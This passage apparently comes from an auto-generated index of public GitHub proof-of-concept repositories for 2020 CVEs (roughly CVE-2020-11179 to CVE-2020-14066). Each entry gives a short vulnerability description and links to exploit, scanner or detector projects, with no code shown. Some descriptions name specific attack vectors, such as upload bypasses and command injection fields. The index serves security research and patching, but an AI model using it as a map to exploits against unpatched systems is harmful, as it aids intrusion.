- [sparrow-labz/CVE-2020-11179-Adreno-Qualcomm-GPU](https://github.com/sparrow-labz/CVE-2020-11179-Adreno-Qualcomm-GPU)
### CVE-2020-11444 (2020-04-02)
Sonatype Nexus Repository Manager 3.x up to and including 3.21.2 has Incorrect Access Control.
- [zhzyker/CVE-2020-11444](https://github.com/zhzyker/CVE-2020-11444)
- [CN016/Nexus-Repository-Manager-3-CVE-2020-11444-](https://github.com/CN016/Nexus-Repository-Manager-3-CVE-2020-11444-)
### CVE-2020-11492 (2020-06-05)
An issue was discovered in Docker Desktop through 2.2.0.5 on Windows. If a local attacker sets up their own named pipe prior to starting Docker with the same name, this attacker can intercept a connection attempt from Docker Service (which runs as SYSTEM), and then impersonate their privileges.
- [CrackerCat/CVE-2020-11492](https://github.com/CrackerCat/CVE-2020-11492)
### CVE-2020-11493 (2020-09-04)
In Foxit Reader and PhantomPDF before 10.0.1, and PhantomPDF before 9.7.3, attackers can obtain sensitive information about an uninitialized object because of direct transformation from PDF Object to Stream without concern for a crafted XObject.
- [fengjixuchui/CVE-2020-11493](https://github.com/fengjixuchui/CVE-2020-11493)
### CVE-2020-11519 (2020-06-22)
The SDDisk2k.sys driver of WinMagic SecureDoc v8.5 and earlier allows local users to read or write to physical disc sectors via a \\.\SecureDocDevice handle. Exploiting this vulnerability results in privileged code execution.
- [patois/winmagic_sd](https://github.com/patois/winmagic_sd)
### CVE-2020-11539 (2020-04-22)
An issue was discovered on Tata Sonata Smart SF Rush 1.12 devices. It has been identified that the smart band has no pairing (mode 0 Bluetooth LE security level) The data being transmitted over the air is not encrypted. Adding to this, the data being sent to the smart band doesn't have any authentication or signature verification. Thus, any attacker can control a parameter of the device.
- [the-girl-who-lived/CVE-2020-11539](https://github.com/the-girl-who-lived/CVE-2020-11539)
### CVE-2020-11546 (2020-07-14)
SuperWebMailer 7.21.0.01526 is susceptible to a remote code execution vulnerability in the Language parameter of mailingupgrade.php. An unauthenticated remote attacker can exploit this behavior to execute arbitrary PHP code via Code Injection.
- [Official-BlackHat13/CVE-2020-11546](https://github.com/Official-BlackHat13/CVE-2020-11546)
- [damit5/CVE-2020-11546](https://github.com/damit5/CVE-2020-11546)
### CVE-2020-11547 (2020-04-04)
PRTG Network Monitor before 20.1.57.1745 allows remote unauthenticated attackers to obtain information about probes running or the server itself (CPU usage, memory, Windows version, and internal statistics) via an HTTP request, as demonstrated by type=probes to login.htm or index.htm.
- [ch-rigu/CVE-2020-11547--PRTG-Network-Monitor-Information-Disclosure](https://github.com/ch-rigu/CVE-2020-11547--PRTG-Network-Monitor-Information-Disclosure)
### CVE-2020-11579 (2020-09-03)
An issue was discovered in Chadha PHPKB 9.0 Enterprise Edition. installer/test-connection.php (part of the installation process) allows a remote unauthenticated attacker to disclose local files on hosts running PHP before 7.2.16, or on hosts where the MySQL ALLOW LOCAL DATA INFILE option is enabled.
- [ShielderSec/CVE-2020-11579](https://github.com/ShielderSec/CVE-2020-11579)
### CVE-2020-11650 (2020-04-08)
An issue was discovered in iXsystems FreeNAS (and TrueNAS) 11.2 before 11.2-u8 and 11.3 before 11.3-U1. It allows a denial of service. The login authentication component has no limits on the length of an authentication message or the rate at which such messages are sent.
- [weinull/CVE-2020-11650](https://github.com/weinull/CVE-2020-11650)
### CVE-2020-11651 (2020-04-30)
An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions.
- [chef-cft/salt-vulnerabilities](https://github.com/chef-cft/salt-vulnerabilities)
- [rossengeorgiev/salt-security-backports](https://github.com/rossengeorgiev/salt-security-backports)
- [dozernz/cve-2020-11651](https://github.com/dozernz/cve-2020-11651)
- [0xc0d/CVE-2020-11651](https://github.com/0xc0d/CVE-2020-11651)
- [jasperla/CVE-2020-11651-poc](https://github.com/jasperla/CVE-2020-11651-poc)
- [bravery9/SaltStack-Exp](https://github.com/bravery9/SaltStack-Exp)
- [kevthehermit/CVE-2020-11651](https://github.com/kevthehermit/CVE-2020-11651)
- [lovelyjuice/cve-2020-11651-exp-plus](https://github.com/lovelyjuice/cve-2020-11651-exp-plus)
- [ssrsec/CVE-2020-11651-CVE-2020-11652-EXP](https://github.com/ssrsec/CVE-2020-11651-CVE-2020-11652-EXP)
- [RakhithJK/CVE-2020-11651](https://github.com/RakhithJK/CVE-2020-11651)
- [appcheck-ng/salt-rce-scanner-CVE-2020-11651-CVE-2020-11652](https://github.com/appcheck-ng/salt-rce-scanner-CVE-2020-11651-CVE-2020-11652)
- [hardsoftsecurity/CVE-2020-11651-PoC](https://github.com/hardsoftsecurity/CVE-2020-11651-PoC)
### CVE-2020-11652 (2020-04-30)
An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow arbitrary directory access to authenticated users.
- [fanjq99/CVE-2020-11652](https://github.com/fanjq99/CVE-2020-11652)
- [Al1ex/CVE-2020-11652](https://github.com/Al1ex/CVE-2020-11652)
- [limon768/CVE-2020-11652-POC](https://github.com/limon768/CVE-2020-11652-POC)
### CVE-2020-11738 (2020-04-13)
The Snap Creek Duplicator plugin before 1.3.28 for WordPress (and Duplicator Pro before 3.8.7.1) allows Directory Traversal via ../ in the file parameter to duplicator_download or duplicator_init.
- [raghu66669999/wordpress-snapcreek](https://github.com/raghu66669999/wordpress-snapcreek)
### CVE-2020-11794
- [w4cky/CVE-2020-11794](https://github.com/w4cky/CVE-2020-11794)
### CVE-2020-11819 (2020-04-16)
In Rukovoditel 2.5.2, an attacker may inject an arbitrary .php file location instead of a language file and thus achieve command execution.
- [danyx07/PoC-RCE-Rukovoditel](https://github.com/danyx07/PoC-RCE-Rukovoditel)
### CVE-2020-11851 (2020-11-17)
Arbitrary code execution vulnerability on Micro Focus ArcSight Logger product, affecting all version prior to 7.1.1. The vulnerability could be remotely exploited resulting in the execution of arbitrary code.
- [ch1nghz/CVE-2020-11851](https://github.com/ch1nghz/CVE-2020-11851)
### CVE-2020-11881 (2020-09-14)
An array index error in MikroTik RouterOS 6.41.3 through 6.46.5, and 7.x through 7.0 Beta5, allows an unauthenticated remote attacker to crash the SMB server via modified setup-request packets, aka SUP-12964.
- [botlabsDev/CVE-2020-11881](https://github.com/botlabsDev/CVE-2020-11881)
### CVE-2020-11883 (2020-04-17)
In Divante vue-storefront-api through 1.11.1 and storefront-api through 1.0-rc.1, as used in VueStorefront PWA, unexpected HTTP requests lead to an exception that discloses the error stack trace, with absolute file paths and Node.js module names.
- [0ndras3k/CVE-2020-11883](https://github.com/0ndras3k/CVE-2020-11883)
### CVE-2020-11890 (2020-04-21)
An issue was discovered in Joomla! before 3.9.17. Improper input validations in the usergroup table class could lead to a broken ACL configuration.
- [HoangKien1020/CVE-2020-11890](https://github.com/HoangKien1020/CVE-2020-11890)
### CVE-2020-11896 (2020-06-17)
The Treck TCP/IP stack before 6.0.1.66 allows Remote Code Execution, related to IPv4 tunneling.
- [Fans0n-Fan/Treck20-Related](https://github.com/Fans0n-Fan/Treck20-Related)
- [0xkol/ripple20-digi-connect-exploit](https://github.com/0xkol/ripple20-digi-connect-exploit)
### CVE-2020-11898 (2020-06-17)
The Treck TCP/IP stack before 6.0.1.66 improperly handles an IPv4/ICMPv4 Length Parameter Inconsistency, which might allow remote attackers to trigger an information leak.
- [scamwork/POC_CVE-2020-11898](https://github.com/scamwork/POC_CVE-2020-11898)
### CVE-2020-11932 (2020-05-13)
It was discovered that the Subiquity installer for Ubuntu Server logged the LUKS full disk encryption password if one was entered.
- [ProjectorBUg/CVE-2020-11932](https://github.com/ProjectorBUg/CVE-2020-11932)
- [Staubgeborener/CVE-2020-11932](https://github.com/Staubgeborener/CVE-2020-11932)
- [code-developers/CVE-2020-11932](https://github.com/code-developers/CVE-2020-11932)
### CVE-2020-11975 (2020-06-05)
Apache Unomi allows conditions to use OGNL scripting which offers the possibility to call static Java classes from the JDK that could execute code with the permission level of the running Java process.
- [1135/unomi_exploit](https://github.com/1135/unomi_exploit)
### CVE-2020-11978 (2020-07-16)
An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable.
- [pberba/CVE-2020-11978](https://github.com/pberba/CVE-2020-11978)
### CVE-2020-11989 (2020-06-22)
Apache Shiro before 1.5.3, when using Apache Shiro with Spring dynamic controllers, a specially crafted request may cause an authentication bypass.
- [HYWZ36/HYWZ36-CVE-2020-11989-code](https://github.com/HYWZ36/HYWZ36-CVE-2020-11989-code)
### CVE-2020-11990 (2020-12-01)
We have resolved a security issue in the camera plugin that could have affected certain Cordova (Android) applications. An attacker who could install (or lead the victim to install) a specially crafted (or malicious) Android application would be able to access pictures taken with the app externally.
- [forse01/CVE-2020-11990-Cordova](https://github.com/forse01/CVE-2020-11990-Cordova)
### CVE-2020-11996 (2020-06-26)
A specially crafted sequence of HTTP/2 requests sent to Apache Tomcat 10.0.0-M1 to 10.0.0-M5, 9.0.0.M1 to 9.0.35 and 8.5.0 to 8.5.55 could trigger high CPU usage for several seconds. If a sufficient number of such requests were made on concurrent HTTP/2 connections, the server could become unresponsive.
- [rusakovichma/tomcat-embed-core-9.0.31-CVE-2020-11996](https://github.com/rusakovichma/tomcat-embed-core-9.0.31-CVE-2020-11996)
### CVE-2020-12077 (2020-04-23)
The mappress-google-maps-for-wordpress plugin before 2.53.9 for WordPress does not correctly implement AJAX functions with nonces (or capability checks), leading to remote code execution.
- [RandomRobbieBF/CVE-2020-12077](https://github.com/RandomRobbieBF/CVE-2020-12077)
### CVE-2020-12078 (2020-04-28)
An issue was discovered in Open-AudIT 3.3.1. There is shell metacharacter injection via attributes to an open-audit/configuration/ URI. An attacker can exploit this by adding an excluded IP address to the global discovery settings (internally called exclude_ip). This exclude_ip value is passed to the exec function in the discoveries_helper.php file (inside the all_ip_list function) without being filtered, which means that the attacker can provide a payload instead of a valid IP address.
- [mhaskar/CVE-2020-12078](https://github.com/mhaskar/CVE-2020-12078)
- [84KaliPleXon3/CVE-2020-12078](https://github.com/84KaliPleXon3/CVE-2020-12078)
### CVE-2020-12112 (2020-04-23)
BigBlueButton before 2.2.5 allows remote attackers to obtain sensitive files via Local File Inclusion.
- [tchenu/CVE-2020-12112](https://github.com/tchenu/CVE-2020-12112)
### CVE-2020-12116 (2020-05-07)
Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a crafted request.
- [BeetleChunks/CVE-2020-12116](https://github.com/BeetleChunks/CVE-2020-12116)
### CVE-2020-12124 (2020-10-02)
A remote command-line injection vulnerability in the /cgi-bin/live_api.cgi endpoint of the WAVLINK WN530H4 M30H4.V5030.190403 allows an attacker to execute arbitrary Linux commands as root without authentication.
- [db44k/CVE-2020-12124](https://github.com/db44k/CVE-2020-12124)
- [Scorpion-Security-Labs/CVE-2020-12124](https://github.com/Scorpion-Security-Labs/CVE-2020-12124)
### CVE-2020-12255 (2020-05-18)
rConfig 3.9.4 is vulnerable to remote code execution due to improper validation in the file upload functionality. vendor.crud.php accepts a file upload by checking content-type without considering the file extension and header. Thus, an attacker can exploit this by uploading a .php file to vendor.php that contains arbitrary PHP code and changing the content-type to image/gif.
- [vishwaraj101/CVE-2020-12255](https://github.com/vishwaraj101/CVE-2020-12255)
### CVE-2020-12351 (2020-11-23)
Improper input validation in BlueZ may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access.
- [naren-jayram/Linux-Heap-Based-Type-Confusion-in-L2CAP](https://github.com/naren-jayram/Linux-Heap-Based-Type-Confusion-in-L2CAP)
### CVE-2020-12432 (2020-07-21)
The WOPI API integration for Vereign Collabora CODE through 4.2.2 does not properly restrict delivery of JavaScript to a victim's browser, and lacks proper MIME type access control, which could lead to XSS that steals account credentials via cookies or local storage. The attacker must first obtain an API access token, which can be accomplished if the attacker is able to upload a .docx or .odt file. The associated API endpoints for exploitation are /wopi/files and /wopi/getAccessToken.
- [d7x/CVE-2020-12432](https://github.com/d7x/CVE-2020-12432)
### CVE-2020-12593 (2020-11-18)
Symantec Endpoint Detection & Response, prior to 4.5, may be susceptible to an information disclosure issue, which is a type of vulnerability that could potentially allow unauthorized access to data.
- [nasbench/CVE-2020-12593](https://github.com/nasbench/CVE-2020-12593)
### CVE-2020-12625 (2020-05-04)
An issue was discovered in Roundcube Webmail before 1.4.4. There is a cross-site scripting (XSS) vulnerability in rcube_washtml.php because JavaScript code can occur in the CDATA of an HTML message.
- [mbadanoiu/CVE-2020-12625](https://github.com/mbadanoiu/CVE-2020-12625)
### CVE-2020-12629 (2020-05-04)
include/class.sla.php in osTicket before 1.14.2 allows XSS via the SLA Name.
- [mkelepce/CVE-2020-12629](https://github.com/mkelepce/CVE-2020-12629)
### CVE-2020-12640 (2020-05-04)
Roundcube Webmail before 1.4.4 allows attackers to include local files and execute code via directory traversal in a plugin name to rcube_plugin_api.php.
- [mbadanoiu/CVE-2020-12640](https://github.com/mbadanoiu/CVE-2020-12640)
### CVE-2020-12641 (2020-05-04)
rcube_image.php in Roundcube Webmail before 1.4.4 allows attackers to execute arbitrary code via shell metacharacters in a configuration setting for im_convert_path or im_identify_path.
- [mbadanoiu/CVE-2020-12641](https://github.com/mbadanoiu/CVE-2020-12641)
- [mbadanoiu/MAL-004](https://github.com/mbadanoiu/MAL-004)
### CVE-2020-12688
- [TheCyberGeek/Centreon-20.04](https://github.com/TheCyberGeek/Centreon-20.04)
### CVE-2020-12695 (2020-06-08)
The Open Connectivity Foundation UPnP specification before 2020-04-17 does not forbid the acceptance of a subscription request with a delivery URL on a different network segment than the fully qualified event-subscription URL, aka the CallStranger issue.
- [yunuscadirci/CallStranger](https://github.com/yunuscadirci/CallStranger)
- [corelight/callstranger-detector](https://github.com/corelight/callstranger-detector)
### CVE-2020-12696 (2020-05-07)
The iframe plugin before 4.5 for WordPress does not sanitize a URL.
- [g-rubert/CVE-2020-12696](https://github.com/g-rubert/CVE-2020-12696)
### CVE-2020-12702 (2021-02-24)
Weak encryption in the Quick Pairing mode in the eWeLink mobile application (Android application V4.9.2 and earlier, iOS application V4.9.1 and earlier) allows physically proximate attackers to eavesdrop on Wi-Fi credentials and other sensitive information by monitoring the Wi-Fi spectrum during the pairing process.
- [salgio/ESPTouchCatcher](https://github.com/salgio/ESPTouchCatcher)
- [salgio/eWeLink-QR-Code](https://github.com/salgio/eWeLink-QR-Code)
### CVE-2020-12712 (2020-06-11)
A vulnerability based on insecure user/password encryption in the JOE (job editor) component of SOS JobScheduler 1.12 and 1.13 allows attackers to decrypt the user/password that is optionally stored with a user's profile.
- [SanderUbink/CVE-2020-12712](https://github.com/SanderUbink/CVE-2020-12712)
### CVE-2020-12717 (2020-05-14)
The COVIDSafe (Australia) app 1.0 and 1.1 for iOS allows a remote attacker to crash the app, and consequently interfere with COVID-19 contact tracing, via a Bluetooth advertisement containing manufacturer data that is too short. This occurs because of an erroneous OpenTrace manuData.subdata call. The ABTraceTogether (Alberta), ProteGO (Poland), and TraceTogether (Singapore) apps were also affected.
- [wabzqem/covidsafe-CVE-2020-12717-exploit](https://github.com/wabzqem/covidsafe-CVE-2020-12717-exploit)
### CVE-2020-12753 (2020-05-11)
An issue was discovered on LG mobile devices with Android OS 7.2, 8.0, 8.1, 9, and 10 software. Arbitrary code execution can occur via the bootloader because of an EL1/EL3 coldboot vulnerability involving raw_resources. The LG ID is LVE-SMP-200006 (May 2020).
- [shinyquagsire23/CVE-2020-12753-PoC](https://github.com/shinyquagsire23/CVE-2020-12753-PoC)
### CVE-2020-12800 (2020-06-08)
The drag-and-drop-multiple-file-upload-contact-form-7 plugin before 1.3.3.3 for WordPress allows Unrestricted File Upload and remote code execution by setting supported_type to php% and uploading a .php% file.
- [amartinsec/CVE-2020-12800](https://github.com/amartinsec/CVE-2020-12800)
### CVE-2020-12828 (2020-05-21)
An issue was discovered in AnchorFree VPN SDK before 1.3.3.218. The VPN SDK service takes certain executable locations over a socket bound to localhost. Binding to the socket and providing a path where a malicious executable file resides leads to executing the malicious executable file with SYSTEM privileges.
- [0xsha/ZombieVPN](https://github.com/0xsha/ZombieVPN)
### CVE-2020-12856 (2020-05-18)
OpenTrace, as used in COVIDSafe through v1.0.17, TraceTogether, ABTraceTogether, and other applications on iOS and Android, allows remote attackers to conduct long-term re-identification attacks and possibly have unspecified other impact, because of how Bluetooth is used.
- [alwentiu/COVIDSafe-CVE-2020-12856](https://github.com/alwentiu/COVIDSafe-CVE-2020-12856)
### CVE-2020-12928 (2020-10-13)
A vulnerability in a dynamically loaded AMD driver in AMD Ryzen Master V15 may allow any authenticated user to escalate privileges to NT authority system.
- [ekknod/AmdRyzenMasterCheat](https://github.com/ekknod/AmdRyzenMasterCheat)
### CVE-2020-13094 (2020-05-18)
Dolibarr before 11.0.4 allows XSS.
- [mkelepce/CVE-2020-13094](https://github.com/mkelepce/CVE-2020-13094)
### CVE-2020-13151 (2020-08-05)
Aerospike Community Edition 4.9.0.5 allows for unauthenticated submission and execution of user-defined functions (UDFs), written in Lua, as part of a database query. It attempts to restrict code execution by disabling os.execute() calls, but this is insufficient. Anyone with network access can use a crafted UDF to execute arbitrary OS commands on all nodes of the cluster at the permission level of the user running the Aerospike service.
- [b4ny4n/CVE-2020-13151](https://github.com/b4ny4n/CVE-2020-13151)
### CVE-2020-13158 (2020-06-22)
Artica Proxy before 4.30.000000 Community Edition allows Directory Traversal via the fw.progrss.details.php popup parameter.
- [InfoSec4Fun/CVE-2020-13158](https://github.com/InfoSec4Fun/CVE-2020-13158)
### CVE-2020-13159 (2020-06-22)
Artica Proxy before 4.30.000000 Community Edition allows OS command injection via the Netbios name, Server domain name, dhclient_mac, Hostname, or Alias field. NOTE: this may overlap CVE-2020-10818.
- [InfoSec4Fun/CVE-2020-13159](https://github.com/InfoSec4Fun/CVE-2020-13159)
### CVE-2020-13162 (2020-06-16)
A time-of-check time-of-use vulnerability in PulseSecureService.exe in Pulse Secure Client versions prior to 9.1.6 down to 5.3 R70 for Windows (which runs as NT AUTHORITY/SYSTEM) allows unprivileged users to run a Microsoft Installer executable with elevated privileges.
- [redtimmy/tu-TOCTOU-kaiu-TOCMEU-CVE-2020-13162-](https://github.com/redtimmy/tu-TOCTOU-kaiu-TOCMEU-CVE-2020-13162-)
### CVE-2020-13254 (2020-06-03)
An issue was discovered in Django 2.2 before 2.2.13 and 3.0 before 3.0.7. In cases where a memcached backend does not perform key validation, passing malformed cache keys could result in a key collision, and potential data leakage.
- [danpalmer/django-cve-2020-13254](https://github.com/danpalmer/django-cve-2020-13254)
### CVE-2020-13259 (2020-09-16)
A vulnerability in the web-based management interface of RAD SecFlow-1v os-image SF_0290_2.3.01.26 could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack on an affected system. The vulnerability is due to insufficient CSRF protections for the web UI on an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to follow a malicious link. A successful exploit could allow the attacker to perform arbitrary actions with the privilege level of the affected user. This could be exploited in conjunction with CVE-2020-13260.
- [UrielYochpaz/CVE-2020-13259](https://github.com/UrielYochpaz/CVE-2020-13259)
### CVE-2020-13277 (2020-06-19)
An authorization issue in the mirroring logic allowed read access to private repositories in GitLab CE/EE 10.6 and later through 13.0.5
- [EXP-Docs/CVE-2020-13277](https://github.com/EXP-Docs/CVE-2020-13277)
### CVE-2020-13401 (2020-06-02)
An issue was discovered in Docker Engine before 19.03.11. An attacker in a container, with the CAP_NET_RAW capability, can craft IPv6 router advertisements, and consequently spoof external IPv6 hosts, obtain sensitive information, or cause a denial of service.
- [arax-zaeimi/Docker-Container-CVE-2020-13401](https://github.com/arax-zaeimi/Docker-Container-CVE-2020-13401)
### CVE-2020-13405 (2020-07-16)
userfiles/modules/users/controller/controller.php in Microweber before 1.1.20 allows an unauthenticated user to disclose the users database via a /modules/ POST request.
- [mrnazu/CVE-2020-13405](https://github.com/mrnazu/CVE-2020-13405)
### CVE-2020-13424 (2020-05-23)
The XCloner component before 3.5.4 for Joomla! allows Authenticated Local File Disclosure.
- [mkelepce/CVE-2020-13424](https://github.com/mkelepce/CVE-2020-13424)
### CVE-2020-13457
- [alt3kx/CVE-2020-13457](https://github.com/alt3kx/CVE-2020-13457)
### CVE-2020-13519 (2020-12-18)
A privilege escalation vulnerability exists in the WinRing0x64 Driver IRP 0x9c402088 functionality of NZXT CAM 4.8.0. A specially crafted I/O request packet (IRP) can cause increased privileges. An attacker can send a malicious IRP to trigger this vulnerability.
- [SpiralBL0CK/poc-for-CVE-2020-13519-still-under-construction-](https://github.com/SpiralBL0CK/poc-for-CVE-2020-13519-still-under-construction-)
### CVE-2020-13640 (2020-06-18)
A SQL injection issue in the gVectors wpDiscuz plugin 5.3.5 and earlier for WordPress allows remote attackers to execute arbitrary SQL commands via the order parameter of a wpdLoadMoreComments request. (No 7.x versions are affected.)
- [asterite3/CVE-2020-13640](https://github.com/asterite3/CVE-2020-13640)
### CVE-2020-13699 (2020-07-29)
TeamViewer Desktop for Windows before 15.8.3 does not properly quote its custom URI handlers. A malicious website could launch TeamViewer with arbitrary parameters, as demonstrated by a teamviewer10: --play URL. An attacker could force a victim to send an NTLM authentication request and either relay the request or capture the hash for offline password cracking. This affects teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, tvpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1, and tvvpn1. The issue is fixed in 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, and 15.8.3.
- [Dilshan-Eranda/CVE-2020-13699](https://github.com/Dilshan-Eranda/CVE-2020-13699)
### CVE-2020-13777 (2020-06-04)
GnuTLS 3.6.x before 3.6.14 uses incorrect cryptography for encrypting a session ticket (a loss of confidentiality in TLS 1.2, and an authentication bypass in TLS 1.3). The earliest affected version is 3.6.4 (2018-09-24) because of an error in a 2018-09-18 commit. Until the first key rotation, the TLS server always uses wrong data in place of an encryption key derived from an application.
- [0xxon/cve-2020-13777](https://github.com/0xxon/cve-2020-13777)
- [shigeki/challenge_CVE-2020-13777](https://github.com/shigeki/challenge_CVE-2020-13777)
- [prprhyt/PoC_TLS1_3_CVE-2020-13777](https://github.com/prprhyt/PoC_TLS1_3_CVE-2020-13777)
### CVE-2020-13851 (2020-06-11)
Artica Pandora FMS 7.44 allows remote command execution via the events feature.
- [hadrian3689/pandorafms_7.44](https://github.com/hadrian3689/pandorafms_7.44)
### CVE-2020-13884 (2020-06-08)
Citrix Workspace App before 1912 on Windows has Insecure Permissions and an Unquoted Path vulnerability which allows local users to gain privileges during the uninstallation of the application.
- [hessandrew/CVE-2020-13884](https://github.com/hessandrew/CVE-2020-13884)
### CVE-2020-13885 (2020-06-08)
Citrix Workspace App before 1912 on Windows has Insecure Permissions which allows local users to gain privileges during the uninstallation of the application.
- [hessandrew/CVE-2020-13885](https://github.com/hessandrew/CVE-2020-13885)
### CVE-2020-13886 (2020-11-26)
Intelbras TIP 200 60.61.75.15, TIP 200 LITE 60.61.75.15, and TIP 300 65.61.75.22 devices allow cgi-bin/cgiServer.exx?page=../ Directory Traversal.
- [Ls4ss/CVE-2020-13886](https://github.com/Ls4ss/CVE-2020-13886)
### CVE-2020-13889 (2020-06-06)
showAlert() in the administration panel in Bludit 3.12.0 allows XSS.
- [gh0st56/CVE-2020-13889](https://github.com/gh0st56/CVE-2020-13889)
### CVE-2020-13925 (2020-07-14)
Similar to CVE-2020-1956, Kylin has one more restful API which concatenates the API inputs into OS commands and then executes them on the server; while the reported API misses necessary input validation, which causes the hackers to have the possibility to execute OS command remotely. Users of all previous versions after 2.3 should upgrade to 3.1.0.
- [bit4woo/CVE-2020-13925](https://github.com/bit4woo/CVE-2020-13925)
### CVE-2020-13933 (2020-08-17)
Apache Shiro before 1.6.0, when using Apache Shiro, a specially crafted HTTP request may cause an authentication bypass.
- [EXP-Docs/CVE-2020-13933](https://github.com/EXP-Docs/CVE-2020-13933)
- [0xkami/cve-2020-13933](https://github.com/0xkami/cve-2020-13933)
- [KingBangQ/CVE-2020-13933Project](https://github.com/KingBangQ/CVE-2020-13933Project)
### CVE-2020-13935 (2020-07-14)
The payload length in a WebSocket frame was not correctly validated in Apache Tomcat 10.0.0-M1 to 10.0.0-M6, 9.0.0.M1 to 9.0.36, 8.5.0 to 8.5.56 and 7.0.27 to 7.0.104. Invalid payload lengths could trigger an infinite loop. Multiple requests with invalid payload lengths could lead to a denial of service.
- [RedTeamPentesting/CVE-2020-13935](https://github.com/RedTeamPentesting/CVE-2020-13935)
- [aabbcc19191/CVE-2020-13935](https://github.com/aabbcc19191/CVE-2020-13935)
### CVE-2020-13937 (2020-10-19)
Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed Kylin's configuration information without any authentication, so it is dangerous because some confidential information entries will be disclosed to everyone.
- [yaunsky/CVE-2020-13937](https://github.com/yaunsky/CVE-2020-13937)
- [Al1ex/CVE-2020-13937](https://github.com/Al1ex/CVE-2020-13937)
- [kailing0220/CVE-2020-13937](https://github.com/kailing0220/CVE-2020-13937)
### CVE-2020-13942 (2020-11-24)
It is possible to inject malicious OGNL or MVEL scripts into the /context.json public endpoint. This was partially fixed in 1.5.1 but a new attack vector was found. In Apache Unomi version 1.5.2 scripts are now completely filtered from the input. It is highly recommended to upgrade to the latest available version of the 1.5.x release to fix this problem.
- [lp008/CVE-2020-13942](https://github.com/lp008/CVE-2020-13942)
- [eugenebmx/CVE-2020-13942](https://github.com/eugenebmx/CVE-2020-13942)
- [shifa123/CVE-2020-13942-POC-](https://github.com/shifa123/CVE-2020-13942-POC-)
- [blackmarketer/CVE-2020-13942](https://github.com/blackmarketer/CVE-2020-13942)
- [yaunsky/Unomi-CVE-2020-13942](https://github.com/yaunsky/Unomi-CVE-2020-13942)
- [hoanx4/apche_unomi_rce](https://github.com/hoanx4/apche_unomi_rce)
- [Prodrious/CVE-2020-13942](https://github.com/Prodrious/CVE-2020-13942)
### CVE-2020-13945 (2020-12-07)
In Apache APISIX, the user enabled the Admin API and deleted the Admin API access IP restriction rules. Eventually, the default token is allowed to access APISIX management data. This affects versions 1.2, 1.3, 1.4, 1.5.
- [YutuSec/Apisix_Crack](https://github.com/YutuSec/Apisix_Crack)
- [K3ysTr0K3R/CVE-2020-13945-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2020-13945-EXPLOIT)
- [x0root/CVE-2020-13945-EXPLOIT](https://github.com/x0root/CVE-2020-13945-EXPLOIT)
### CVE-2020-13957 (2020-10-13)
Apache Solr versions 6.6.0 to 6.6.6, 7.0.0 to 7.7.3 and 8.0.0 to 8.6.2 prevents some features considered dangerous (which could be used for remote code execution) to be configured in a ConfigSet that's uploaded via API without authentication/authorization. The checks in place to prevent such features can be circumvented by using a combination of UPLOAD/CREATE actions.
- [s-index/CVE-2020-13957](https://github.com/s-index/CVE-2020-13957)
### CVE-2020-13958 (2020-11-17)
A vulnerability in Apache OpenOffice scripting events allows an attacker to construct documents containing hyperlinks pointing to an executable on the target users file system. These hyperlinks can be triggered unconditionally. In fixed versions no internal protocol may be called from the document event handler and other hyperlinks require a control-click.
- [Grey-Junior/CVE-2020-13958](https://github.com/Grey-Junior/CVE-2020-13958)
### CVE-2020-13965 (2020-06-09)
An issue was discovered in Roundcube Webmail before 1.3.12 and 1.4.x before 1.4.5. There is XSS via a malicious XML attachment because text/xml is among the allowed types for a preview.
- [mbadanoiu/CVE-2020-13965](https://github.com/mbadanoiu/CVE-2020-13965)
### CVE-2020-13973 (2020-06-09)
OWASP json-sanitizer before 1.2.1 allows XSS. An attacker who controls a substring of the input JSON, and controls another substring adjacent to a SCRIPT element in which the output is embedded as JavaScript, may be able to confuse the HTML parser as to where the SCRIPT element ends, and cause non-script content to be interpreted as JavaScript.
- [epicosy/json-sanitizer](https://github.com/epicosy/json-sanitizer)
### CVE-2020-13995 (2020-09-25)
U.S. Air Force Sensor Data Management System extract75 has a buffer overflow that leads to code execution. An overflow in a global variable (sBuffer) leads to a Write-What-Where outcome. Writing beyond sBuffer will clobber most global variables until reaching a pointer such as DES_info or image_info. By controlling that pointer, one achieves an arbitrary write when its fields are assigned. The data written is from a potentially untrusted NITF file in the form of an integer. The attacker can gain control of the instruction pointer.
- [dbrumley/extract75-cve-2020-13995](https://github.com/dbrumley/extract75-cve-2020-13995)
### CVE-2020-13996 (2020-06-09)
The J2Store plugin before 3.3.13 for Joomla! allows a SQL injection attack by a trusted store manager.
- [mkelepce/CVE-2020-13996](https://github.com/mkelepce/CVE-2020-13996)
### CVE-2020-14064 (2020-07-15)
IceWarp Email Server 12.3.0.1 has Incorrect Access Control for user accounts.
- [networksecure/CVE-2020-14064](https://github.com/networksecure/CVE-2020-14064)
### CVE-2020-14065 (2020-07-15)
IceWarp Email Server 12.3.0.1 allows remote attackers to upload files and consume disk space.
- [networksecure/CVE-2020-14065](https://github.com/networksecure/CVE-2020-14065)
- [pinpinsec/CVE-2020-14065](https://github.com/pinpinsec/CVE-2020-14065)
### CVE-2020-14066 (2020-07-15)
